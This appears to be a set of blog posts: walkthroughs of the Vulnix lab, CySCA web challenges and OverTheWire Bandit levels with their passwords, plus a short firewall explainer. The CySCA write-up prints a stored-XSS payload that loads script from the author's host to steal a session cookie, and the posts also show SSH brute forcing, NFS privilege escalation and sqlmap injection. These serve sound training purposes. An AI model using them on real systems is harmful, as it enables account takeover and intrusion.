Exploitation Testing – Vulnix

Knock Knock !! Who's ther?? - No one!!

let me come through back door

Here we have a vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions

The goal; boot up, find the IP, hack away and obtain the trophy hidden away in /root by any means you wish – excluding the actual hacking of the vmdk

1. Finding victim machine’s (Vulnix VM) IP address.

root@kali:~# netdiscover -r 192.168.43.0/24  

2. A port scan on the victim host.

root@kali:~# nmap -sT -p- -Pn -n -v 192.168.43.33 -T5

3. Finding users of the victim host.

root@kali:~# smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.43.33

4. Running finger against the usernames we found.

5. Since we have NFS service running on port 2049, we may be able to mount a share and find some data.

The mounted share cannot be accessed, because the root_squash flag is set.

6. Brute forcing SSH to find the password for the account named “user”.

 After that we could gain the access of the account user over SSH.

7. Finding UID of user account called vulnix and create a temporary user on our system.

8. Generate an SSH key to log in to the server as user vulnix without password.

We have to copy the generated ssh-key into the /home/vulnix/.ssh/authorized_keys file.

9. Login to the victim's machine as ‘vulnix’.

10. vulnix can run a command to open /etc/exports without typing a password.

Then we have to replace the root_squash flag with no_root_squash. Then reboot it manually.

Once the machine has rebooted, mount the partition again.

11. Once mounted, get a copy of the victim’s machine local shell and change the ownership and SID to the root one.

On my local machine, as ‘root’:

  

On the victim's machine:

There are multiple backdoors in old operating systems. But when it comes to modern OS this is kind of difficult hard. Even not possible. This is just a one method u can breach through

Web Penetration Testing - Reveal Flags

Web Penetration Testing 1 – Club Status

Turn on the intercept of burp suit and go to the web site. Then you can see the GET request. There are two cookies called PHPSESSID and vip. Then we have to edit the vip cookie value from 0 to 1 and forward the request.

Then you can see the page with the available Blog link. Then click the Blog link and the flag for this challenge is revealed.

  

1)      Web Penetration Testing 2 – Om nom nom nom

After completing challenge 1, you can browse in the Blog page. There is a user called Sycamore. Then go to the blog of Sycamore and there is a comment box. We can put comments on it. Then we have to find the vulnerabilities of this comment box. 

Type [<script>alert(“xss”)</script>](xss) in the comment box and submit it. You can see the alert message.

That’s it. We found the XSS vulnerability. The next step is to steal the PHPSESSID cookie of Sycamore. To do that, we have to host a server. We can create a file name .j containing some JavaScript to steal the user cookie. We can use pythons SimpleHTTPServer to host it on port 80.

Now we can create a XSS payload for the comment field. It looks like this.

[<script src=//<IP>/file.j>](test)

Add this comment to the blog page and wait some time. After a small time we can see the entries in the python server like this.

From that, we can get the cookie value of Sycamore. By loading the page with the cookie value we got from the server, the flag is revealed.

1)      Web Penetration Testing 3 – Nonce-sense

After looking around the site while logged in as Sycamore, we notice that users can delete comments. The CSRF token prevents automated tools from testing payloads. Burp has a feature for this using macros.

We need to setup burp with a new session handling rule, record a macro and use it to generate new CSRF tokens for requests.

We need add custom parameter for CSRF tokens.

We need to ensure that what parameter we want to macro to update.

We need to define the scope of the session.

Then go to the Repeater and press the Go button. When you press the Go button, you can get the different CSRF tokens.

You can test some Sql injection here by adding ‘ , after the comment_id=. So, we can notice that there is Sql injection vulnerability.

Get the request to a file and name it as “deletecomment_file”.

Now we have to do the rest using Sqlmap tool.

We can see the 5 tables in the cysca database. We use the “flag” table.

Finally, we can reveal the flag.

What Is a Firewall?

We all heard about firewall at some point of time, what are they used for ? Do they stop viruses?

Well actually, there is a great chance that you are now using a firewall,  if  your are running a modern OS on your computer, there is be one built in, or else your security suite will have a firewall.

But what is this firewall for? Keep reading for reasons why you do, need it.

What Is a Firewall?

Lets start it with what a firewall actually is. You should understand that there are no sparks, no flames, no fuel of any kind of that stuff involved,

A firewall is a shield or barrier which is intended to protect your PC, phone or tablet from data-based malware dangers that exist everywhere on the Internet. 

Data is usually exchanged between your computer and servers and routers in cyberspace while you are using internet, and the purpose of firewalls is to monitor this data (sent in packets) and check if they are safe or not.

Firewalls do this by establishing whether the packets meet the rules that have been set up. Depending on on these rules, packets of data are rejected or accepted.

Most operating systems (both desktop and mobile) will have a basic built-in firewall, but the best results can be seen by using a dedicated firewall application. Here are 5 reasons why you should use  a Firewall.

1. A Firewall Can Protect Your Computer From Unauthorized Remote Access

The worst thing that can happen to a computer user is someone attempting to take control of it remotely. Seeing mouse of your PC move around your monitor as a remote intruder usurps your digital world, assuming control of your personal data, is petrifying.

With a well configured firewall (and a modern OS) you will have remote desktop access disabled, and thus preventing hackers from taking charge of your computer.

2. Firewalls Can Block Messages Linking to Unwanted Content

There are still people out there running older versions of Windows(i mean very old like Windows XP). Worse part is that they are using XP without any firewall, and the built-in firewall is not enabled by default.

You read that right. The Internet has a lot of malware traversing the cyberspace, waiting to pounce on the unprotected PCs. Even though your ISP can help prevent this, it is unlikely that they will be able to in a long run.

3. Firewalls Make Online Gaming Safer

In the history of video games, online gaming is one of the most significant development and it it also a potential security risk. Many kinds of malware has been developed which targets online gamers, who use an unsecured or compromised game servers.

4. You Can Block Unsuitable Content With a Firewall

So far, we have been talking mainly about blocking hackers and other types of remote access threats like  malware, but firewalls are capable of more than just that. Apart from protecting you from ransomware directories, firewall applications also have an option to block particular online locations.

5. Firewalls Can Be Hardware or Software

As we said above, firewalls don not necessarily have to be just software. Hardware firewalls are also found in most homes, built into your router. You can access these firewalls by using the administrative credentials for the router, and once you’ve signed in you should be able to review the options and change them if necessary.

Hope you like this article, please comment your opinion below.

WarGames - OverTheWire

http://overthewire.org/wargames/

Bandit Level 0 -> 1

Recently I’ve been obsessed with a wargaming site called overthewire.org. At the time of this writing I have made it through a few of the servers already, but I will post my solutions to the entry level server they offer, “Bandit”. This is also the recommended place to start if you are new to the site. You should already be familiar with basic Linux commands before attempting this wargame. However, the first page of Bandit explains what to do if you don’t know a command. You do need to use a bit of your own intuition to figure out how to make it from one level to the next.

I have been through a good handful of wargaming sites in the past and I find this one to be of good quality with an interesting variety of servers to play. For those who don’t know what a wargame is, a wargame in hacking is a security challenge in which one must exploit a vulnerability in a system or application or gain access to a computer system. Most of the servers here are about program exploitation on the Linux platform. We do not have to be on a Linux system to play these. But why not? If you have access to a Linux box, a real terminal is the way to go. Puttyis the way to go on Windows.  But I digress, use my posted solutions to learn and understand the levels or compare with your own solutions. Enjoy!

Level 0:

We simply ssh to bandit0@bandit.labs.overthewire.org using the password bandit0 and we are in our shell.

Level 0 -> 1:

Once in, we can see that the readme file is in our home directory. Simply “cat” it and grab the password for level1.

1 2 3 4

bandit0@melissa:~$ ls readme bandit0@melissa:~$ cat readme boJ9jbbUNNfktd78OOpsqOltutMc3MY1

Level 1-> 2:

We are told that the password is in a file called “-“. We need to delimit the dash to read it.

1 2 3 4

bandit1@melissa:~$ ls - bandit1@melissa:~$ cat ./- CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9

Level 2 ->3:

This time we simply need to read a file with spaces in it’s name. Let’s surround the file name in quotes.

1 2 3 4

bandit2@melissa:~$ ls spaces in this filename bandit2@melissa:~$ cat "spaces in this filename" UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK

Level 3->4:

We are told the file we need is in a hidden file in the inhere directory.

1 2 3 4 5 6 7 8 9 10

bandit3@melissa:~$ ls inhere bandit3@melissa:~$ cd inhere bandit3@melissa:~/inhere$ ls -la total 12 drwxr-xr-x 2 root    root    4096 2012-05-10 23:51 . drwxr-xr-x 3 root    root    4096 2012-05-10 23:51 .. -rw-r----- 1 bandit4 bandit3   33 2012-05-10 23:51 .hidden bandit3@melissa:~/inhere$ cat .hidden pIwrPrtPN36QITSp3EQaw936yaFoFgAB

Level 4 ->5:

We are told the password is somewhere in the inhere directory and is the only human readable file in the directory. Let’s see what file types we have.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

bandit4@melissa:~$ ls inhere bandit4@melissa:~$ cd inhere bandit4@melissa:~/inhere$ ls -la total 48 drwxr-xr-x 2 root    root    4096 2012-05-10 23:51 . drwxr-xr-x 3 root    root    4096 2012-05-10 23:51 .. -rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file00 -rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file01 -rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file02 -rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file03 -rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file04 -rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file05 -rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file06 -rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file07 -rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file08 -rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file09 bandit4@melissa:~/inhere$ file ./-* ./-file00: data ./-file01: data ./-file02: data ./-file03: data ./-file04: data ./-file05: data ./-file06: data ./-file07: ASCII text ./-file08: data ./-file09: data bandit4@melissa:~/inhere$ cat ./-file07 koReBOKuIDDepwhWk7jZC0RTdopnAYKh

Level 5-> 6:
This is similar to the previous, except we have some more file attributes to look for. As well as more files to look through.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

bandit5@melissa:~$ ls inhere bandit5@melissa:~$ cd inhere bandit5@melissa:~/inhere$ ls -la total 88 drwxr-x--- 22 root bandit5 4096 2012-05-10 23:51 . drwxr-xr-x  3 root root    4096 2012-05-10 23:51 .. drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere00 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere01 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere02 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere03 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere04 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere05 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere06 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere07 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere08 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere09 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere10 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere11 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere12 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere13 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere14 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere15 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere16 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere17 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere18 drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere19 bandit5@melissa:~/inhere$ find ./ -size 1033c ./maybehere07/.file2 bandit5@melissa:~/inhere$ cat ./maybehere07/.file2 DXjZPULLxYr17uwoI01bNLQbtFemEgo7

Level 6->7:

The file can be anywhere on the server, but we are given it’s attributes. This is a job for find. The command attached to the end gets rid of garbage returns and allows viewing of our password file amongst several others with the same attributes.

1 2 3 4

bandit6@melissa:~$ find / -user bandit7 -group bandit6 -size 33c 2>/dev/null /var/lib/dpkg/info/bandit7.password bandit6@melissa:~$ cat /var/lib/dpkg/info/bandit7.password HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs

Level 7->8:

The password for the next level is stored in the file data.txt next to the word millionth. We can pipe cat to grep for this.

1 2 3 4

bandit7@melissa:~$ ls data.txt bandit7@melissa:~$ cat data.txt | grep millionth millionth       cvX2JJa4CFALtqS87jk27qwqGhBM9plV

Level 8->9:

Here we need to find a unique line among many. We can pipe a few commands together to do this. Note the commands do need to be in this order.

1 2 3 4

bandit8@melissa:~$ ls data.txt bandit8@melissa:~$ cat data.txt | sort | uniq -u UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR

Level 9->10:

The password for the next level is stored in the file data.txt among of few lines of human-readable strings starting with ‘=’ characters.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

bandit9@melissa:~$ ls data.txt bandit9@melissa:~$ strings data.txt | grep '=' ========== the R=ev2, NF=!^ M5Q= ========== password TuI@= ========== iss c       =$ w=RO eD=p jR=JlB G========== truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk :=*1p KA=%

We can see our password string amongst our output.

Level 10->11:
The password for the next level is stored in the file data.txt, which contains base64 encoded data. We need to decode the file.

1 2 3 4

bandit10@melissa:~$ ls data.txt bandit10@melissa:~$ base64 -d data.txt The password is IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR

Level 11->12:

The password is encoded using simple rot13 encryption. There are many options to solve this including using various scripting languages and simply using an online rot13 decoder. Let’s try a solution in our shell.

1 2 3 4

bandit11@melissa:~$ ls data.txt bandit11@melissa:~$ cat data.txt | tr a-zA-Z n-za-mN-ZA-M The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu

That command is given on the wikipedia page for rot13

Level 12->13:

The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it is necessary to create a directory under /tmp in which you can work using mkdir. We need to decompress and check the file over and over again until we get the right format.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

bandit12@melissa:~$ ls data.txt bandit12@melissa:~$ file data.txt data.txt: ASCII text bandit12@melissa:~$ mkdir /tmp/stw bandit12@melissa:~$ cd /tmp/stw bandit12@melissa:/tmp/stw$ xxd -r ~/data.txt > data.txt bandit12@melissa:/tmp/stw$ file data.txt data.txt: gzip compressed data, was "data2.bin", from Unix, last modified: Thu May 10 23:52:05 2012, max compression bandit12@melissa:/tmp/stw$ zcat data.txt > dataNew bandit12@melissa:/tmp/stw$ ls dataNew  data.txt bandit12@melissa:/tmp/stw$ file dataNew dataNew: bzip2 compressed data, block size = 900k bandit12@melissa:/tmp/stw$ bzip2 -d dataNew bzip2: Can't guess original name for dataNew -- using dataNew.out bandit12@melissa:/tmp/stw$ ls dataNew.out  data.txt bandit12@melissa:/tmp/stw$ file dataNew.out dataNew.out: gzip compressed data, was "data4.bin", from Unix, last modified: Thu May 10 23:52:05 2012, max compression bandit12@melissa:/tmp/stw$ zcat dataNew.out > evenNewer bandit12@melissa:/tmp/stw$ ls dataNew.out  data.txt  evenNewer bandit12@melissa:/tmp/stw$ file evenNewer evenNewer: POSIX tar archive (GNU) bandit12@melissa:/tmp/stw$ tar -xvf evenNewer data5.bin bandit12@melissa:/tmp/stw$ file data5.bin data5.bin: POSIX tar archive (GNU) bandit12@melissa:/tmp/stw$ tar -xvf data5.bin data6.bin bandit12@melissa:/tmp/stw$ file data6.bin data6.bin: bzip2 compressed data, block size = 900k bandit12@melissa:/tmp/stw$ bzip2 -d data6.bin bzip2: Can't guess original name for data6.bin -- using data6.bin.out bandit12@melissa:/tmp/stw$ ls data5.bin  data6.bin.out  dataNew.out  data.txt  evenNewer bandit12@melissa:/tmp/stw$ file data6.bin.out data6.bin.out: POSIX tar archive (GNU) bandit12@melissa:/tmp/stw$ tar -xvf data6.bin.out data8.bin bandit12@melissa:/tmp/stw$ file data8.bin data8.bin: gzip compressed data, was "data9.bin", from Unix, last modified: Thu May 10 23:52:05 2012, max compression bandit12@melissa:/tmp/stw$ zcat data8.bin > lost bandit12@melissa:/tmp/stw$ ls data5.bin  data6.bin.out  data8.bin  dataNew.out  data.txt  evenNewer  lost bandit12@melissa:/tmp/stw$ file lost lost: ASCII English text bandit12@melissa:/tmp/stw$ cat lost The password is <strong>8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL</strong>

At last, we have our password.

Level 13->14:

This one switches things up a little. The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. We need to borrow an SSH key to move on.

1 2 3 4 5 6 7 8 9 10

bandit13@melissa:~$ ls sshkey.private bandit13@melissa:~$ ssh -i sshkey.private bandit14@localhost Could not create directory '/home/bandit13/.ssh'. The authenticity of host 'localhost (127.0.0.1)' can't be established. RSA key fingerprint is 9d:09:d9:46:84:df:f9:dd:cc:7c:dc:49:a0:95:b2:10. Are you sure you want to continue connecting (yes/no)? yes Failed to add the host to the list of known hosts (/home/bandit13/.ssh/known_hosts). bandit14@melissa:~$ cat /etc/bandit_pass/bandit14 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e

And just like that, we are dumped into bandit14’s shell.

Level 14->15:

The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost. Here we have a lesson in telnet. Basically, we will use telnet to connect to localhost on port 30000 and enter the password while we are still in bandit14’s shell.

1 2 3 4 5 6 7 8 9

bandit14@melissa:~$ telnet localhost 30000 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e Correct! BfMYroe26WYalil77FoDi9qh59eK5xNr   Connection closed by foreign host.

Level 15->16: